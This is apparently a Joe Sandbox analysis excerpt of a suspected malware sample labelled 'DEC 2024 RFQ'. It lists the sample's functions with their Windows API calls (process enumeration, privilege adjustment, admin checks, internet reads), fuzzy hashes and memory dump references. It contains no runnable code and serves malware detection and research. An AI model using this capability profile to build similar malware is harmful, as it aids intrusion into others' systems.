                                                                                                                      • API String ID: 2574300362-192647395
                                                                                                                      • Opcode ID: 2d25f4033b67f2bf4f6a7e3d7151395e1260d083ec9849dfd4be177f45935d7e
                                                                                                                      • Instruction ID: f1e44243d92c61d453254cbce1811e52396188dd9bff2acf978cd924e85a4689
                                                                                                                      • Opcode Fuzzy Hash: 2d25f4033b67f2bf4f6a7e3d7151395e1260d083ec9849dfd4be177f45935d7e
                                                                                                                      • Instruction Fuzzy Hash: 1AD05B34A10723CFD7209FF1EC68B5676E8AF06391B11C83DD4C6D6150D774D480CA64
                                                                                                                      Function 00033030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 674341424-0
                                                                                                                      • Opcode ID: 1b9ecb661ede1a2a48c47d56961e8c5ffdb9573fc79e0aa400ded22f961e00d3
                                                                                                                      • Instruction ID: 0fc57bfcd17915c431767d08657c67710728c43bb348b948d02edd3fa3353b2e
                                                                                                                      • Opcode Fuzzy Hash: 1b9ecb661ede1a2a48c47d56961e8c5ffdb9573fc79e0aa400ded22f961e00d3
                                                                                                                      • Instruction Fuzzy Hash: F022B0716083119FC725DF14D891BAFB7E9BF84310F04492DF89A97292DB71EA44CB92
                                                                                                                      Function 0009EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0009EE3D
                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0009EE4B
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0009EF0B
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0009EF1A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2576544623-0
                                                                                                                      • Opcode ID: 0dc18cc320b4ebc1a767584cb57ad33a0a4ffe449fbc5e1432227ea07f1dfcb7
                                                                                                                      • Instruction ID: 5a0a325e167e148fa2c5bae93b4963132e522d739f40e8250fc508ce74b90f27
                                                                                                                      • Opcode Fuzzy Hash: 0dc18cc320b4ebc1a767584cb57ad33a0a4ffe449fbc5e1432227ea07f1dfcb7
                                                                                                                      • Instruction Fuzzy Hash: 2D518E71504711AFD710EF20DC85EABB7E8EF94710F50482DF995972A2EB70A908CB92
                                                                                                                      Function 0002FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharUpper
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3964851224-0
                                                                                                                      • Opcode ID: 84255cf0831d290384748188607314cb73c4b40b5f71da565cfd71f7aa836b09
                                                                                                                      • Instruction ID: 6aa70b618c392eb555a9e88903b1695d3498942b2c8ec8b3bac37b317bfd2a28
                                                                                                                      • Opcode Fuzzy Hash: 84255cf0831d290384748188607314cb73c4b40b5f71da565cfd71f7aa836b09
                                                                                                                      • Instruction Fuzzy Hash: 6992AA70A083418FD765DF24C490B6BBBE9BF85304F14896DE88A9B362D771EC45CB92
                                                                                                                      Function 0007E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0007E628
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrlen
                                                                                                                      • String ID: ($|
                                                                                                                      • API String ID: 1659193697-1631851259
                                                                                                                      • Opcode ID: 80ff450e0d840d7471e8fd7c4a178e967e134f718942914b3b08af9ba4383aae
                                                                                                                      • Instruction ID: 9f7dfd64103e9a545fa1cb2a7257e138d48870fb22b838c8546882ce73c1bc74
                                                                                                                      • Opcode Fuzzy Hash: 80ff450e0d840d7471e8fd7c4a178e967e134f718942914b3b08af9ba4383aae
                                                                                                                      • Instruction Fuzzy Hash: 5B323675A017059FD728CF29C4819AAB7F0FF48310B15C4AEE99ADB3A2E774E941CB44
                                                                                                                      Function 000922EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0009180A,00000000), ref: 000923E1
                                                                                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00092418
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 599397726-0
                                                                                                                      • Opcode ID: 0085386f35c5c1927dc16bfb9974916012c9f9a7d56aa1b8fc5ea768c91eabf1
                                                                                                                      • Instruction ID: 4cb787090e03446dc1e8eda3981dd5b7867c432be074384d81a11863bbd2abae
                                                                                                                      • Opcode Fuzzy Hash: 0085386f35c5c1927dc16bfb9974916012c9f9a7d56aa1b8fc5ea768c91eabf1
                                                                                                                      • Instruction Fuzzy Hash: FE41C3B1904209BFEF20DE95DC85FBFB7FCEB40314F10806AF641A6141EA759E41AA64
                                                                                                                      Function 0008B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0008B343
                                                                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0008B39D
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0008B3EA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1682464887-0
                                                                                                                      • Opcode ID: 544ba3ee2376b8146dd37750b2975d72fff700d5cf24d1a5ed6058d20bdca242
                                                                                                                      • Instruction ID: 18bcef262a60bc38f6900bef8e5754e6812a200e972573a736ad2718f41a8e32
                                                                                                                      • Opcode Fuzzy Hash: 544ba3ee2376b8146dd37750b2975d72fff700d5cf24d1a5ed6058d20bdca242
                                                                                                                      • Instruction Fuzzy Hash: 45217135A00518EFDB00EFA5D881AEEBBB8FF49310F1480AAE945AB352CB319915CB54
                                                                                                                      Function 000787E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00040DB6: std::exception::exception.LIBCMT ref: 00040DEC
                                                                                                                        • Part of subcall function 00040DB6: __CxxThrowException@8.LIBCMT ref: 00040E01
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0007882B
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00078858
                                                                                                                      • GetLastError.KERNEL32 ref: 00078865
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1922334811-0
                                                                                                                      • Opcode ID: eb1eadaaaf86748b7bddcfe6ac107131a4bb8b87be6a3e98f05fc54ad1157b92
                                                                                                                      • Instruction ID: 4ffa9e954f185ea6df1e2d6d7f423ca83e1d27690a9c76c452009ebc804706c9
                                                                                                                      • Opcode Fuzzy Hash: eb1eadaaaf86748b7bddcfe6ac107131a4bb8b87be6a3e98f05fc54ad1157b92
                                                                                                                      • Instruction Fuzzy Hash: DB116DB2814205AFE718DFA4DC89D6BB7F8EB45711B20C52EE45997241EE34BC418B64
                                                                                                                      Function 0007874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00078774
                                                                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0007878B
                                                                                                                      • FreeSid.ADVAPI32(?), ref: 0007879B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3429775523-0
                                                                                                                      • Opcode ID: a0722ab54917a20cfa07e1e4a95b63b5e5a3cec17763dd8736f468535abd2f0b
                                                                                                                      • Instruction ID: 9f8489539195e361902b4359a18f9474371fa2cbdaba843524bc1ce7e223cf93
                                                                                                                      • Opcode Fuzzy Hash: a0722ab54917a20cfa07e1e4a95b63b5e5a3cec17763dd8736f468535abd2f0b
                                                                                                                      • Instruction Fuzzy Hash: 39F04F7595130DBFEF04DFF4DC89EBEB7BCEF08201F108469A501E2181E6755A048B50
                                                                                                                      Function 0008C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0008C6FB
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0008C72B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2295610775-0
                                                                                                                      • Opcode ID: 09a3dc45af40b52c50e864a34dbaed48402ab4aa778e00776fa1df0003a9fb73
                                                                                                                      • Instruction ID: 8d46a50f478b06352c1e3060a51ae67dbf547b0043af3fa86c788a36397e17d3
                                                                                                                      • Opcode Fuzzy Hash: 09a3dc45af40b52c50e864a34dbaed48402ab4aa778e00776fa1df0003a9fb73
                                                                                                                      • Instruction Fuzzy Hash: 0111A1726006009FDB10EF29D845A6AF7E8FF85320F04851EF8AAC7291DB34AC01CF91
                                                                                                                      Function 0008A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00099468,?,000AFB84,?), ref: 0008A097
                                                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00099468,?,000AFB84,?), ref: 0008A0A9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFormatLastMessage
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3479602957-0
                                                                                                                      • Opcode ID: 07fdd7d8e70c7c45b8a1d0a5916707c862edc4d807d5f8a603d026bfb5d9b454
                                                                                                                      • Instruction ID: 6d126f20de8c79d5b29a952e0d844d30e19687b55f4e1b1b388b38835b7dbde5
                                                                                                                      • Opcode Fuzzy Hash: 07fdd7d8e70c7c45b8a1d0a5916707c862edc4d807d5f8a603d026bfb5d9b454
                                                                                                                      • Instruction Fuzzy Hash: 37F0823520522DABEB21AFA4DC48FEA776CBF09362F004166F949D6181D670AA44CBA1
                                                                                                                      Function 000781CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00078309), ref: 000781E0
                                                                                                                      • CloseHandle.KERNEL32(?,?,00078309), ref: 000781F2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 81990902-0
                                                                                                                      • Opcode ID: a46d6eff7548ff0d64bdc03db9a79f32c9315f5d6847ba13659133b143cc0ff0
                                                                                                                      • Instruction ID: c69286e69e2d681445ed975dd6596a7de2018d9679685b7415cd666ce47bdb68
                                                                                                                      • Opcode Fuzzy Hash: a46d6eff7548ff0d64bdc03db9a79f32c9315f5d6847ba13659133b143cc0ff0
                                                                                                                      • Instruction Fuzzy Hash: 6FE04672010A11AEEB212B62EC08DB37BEEEB00310710886DB9A684431CB32ACA0DB14
                                                                                                                      Function 0004A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00048D57,?,?,?,00000001), ref: 0004A15A
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0004A163
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3192549508-0
                                                                                                                      • Opcode ID: b0dc7734f3bc00b3aad154c24d373d23a4fcfde39065b05d78ea1b097cc91fd5
                                                                                                                      • Instruction ID: 8eb26ffcfb958aed445ca6e6b707e421638f24306f76202c051f4e7373a61562
                                                                                                                      • Opcode Fuzzy Hash: b0dc7734f3bc00b3aad154c24d373d23a4fcfde39065b05d78ea1b097cc91fd5
                                                                                                                      • Instruction Fuzzy Hash: 54B0923205460AABEF002BD1EC59BA83F68EB46AA2F404020F60D84060CBE656508A91
                                                                                                                      Function 0002E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Variable must be of type 'Object'., xrefs: 00063E62
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Variable must be of type 'Object'.
                                                                                                                      • API String ID: 0-109567571
                                                                                                                      • Opcode ID: ccddc71a34ae85f069071d9af14fd863b5d37aee12eb13f910bc81d14d10908b
                                                                                                                      • Instruction ID: 0fc78e96a01dc5ca451da6ecb2d02a8a4de07b300a49396198092c3f1d114a7b
                                                                                                                      • Opcode Fuzzy Hash: ccddc71a34ae85f069071d9af14fd863b5d37aee12eb13f910bc81d14d10908b
                                                                                                                      • Instruction Fuzzy Hash: 65A2AD74A40265CFCB64CF54E480AAEB7F2FF59310F64806AE909AB352D735ED42CB91
                                                                                                                      Function 0004F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b1a05da662e97d70db29166ec363e4228a43aeb62d956b8b368dea606a04f578
                                                                                                                      • Instruction ID: 01ea0fedd0cfaeedf961bd634df591a2abc52be7d5624a2dcdb37981ed946b60
                                                                                                                      • Opcode Fuzzy Hash: b1a05da662e97d70db29166ec363e4228a43aeb62d956b8b368dea606a04f578
                                                                                                                      • Instruction Fuzzy Hash: 31320461D29F424DEB639634D872336A289AFB73C4F15D737F819B5EA6EB28C4834104
                                                                                                                      Function 0005242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 26e56efa24915c3821e3d2c1245e37eb3c34e25c70ef4d231ea3487f2f1bcb40
                                                                                                                      • Instruction ID: f1676304189c4d4ffd329f06d3a39688667adc762eafa6c1c237cb3d1ebb861c
                                                                                                                      • Opcode Fuzzy Hash: 26e56efa24915c3821e3d2c1245e37eb3c34e25c70ef4d231ea3487f2f1bcb40
                                                                                                                      • Instruction Fuzzy Hash: 23B10120E2AF404DE72396398835336BB9CAFBB6C5F51D71BFC2670D22EB2585834241
                                                                                                                      Function 00088889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __time64.LIBCMT ref: 0008889B
                                                                                                                        • Part of subcall function 0004520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00088F6E,00000000,?,?,?,?,0008911F,00000000,?), ref: 00045213
                                                                                                                        • Part of subcall function 0004520A: __aulldiv.LIBCMT ref: 00045233
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
